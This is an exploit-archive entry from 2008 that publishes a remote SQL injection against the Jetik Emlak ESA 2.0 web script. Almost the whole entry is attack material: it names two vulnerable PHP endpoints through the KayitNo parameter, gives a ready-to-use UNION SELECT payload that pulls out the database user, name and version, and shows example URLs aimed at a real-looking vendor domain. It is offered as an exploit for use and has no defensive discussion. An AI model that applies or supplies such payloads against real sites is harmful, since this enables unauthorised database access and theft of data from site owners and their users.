Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities

2008-09-24T00:00:00
ID 1337DAY-ID-3740
Type zdt
Reporter ZoRLu
Modified 2008-09-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Jetik Emlak ESA 2.0 Multiple Remote SQL Injection Vulnerabilities
=================================================================



[~] Jetik Emlak ESA 2.0 System Script
[~]
[~] (KayitNo) multiple remote sql inj
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 24.09.2008
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/diger.php?KayitNo=[SQL]

http://localhost/script_path/sayfalar.php?KayitNo=[SQL]

[SQL]= 

-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example:

http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example 2:

http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*




#  0day.today [2018-01-04]  #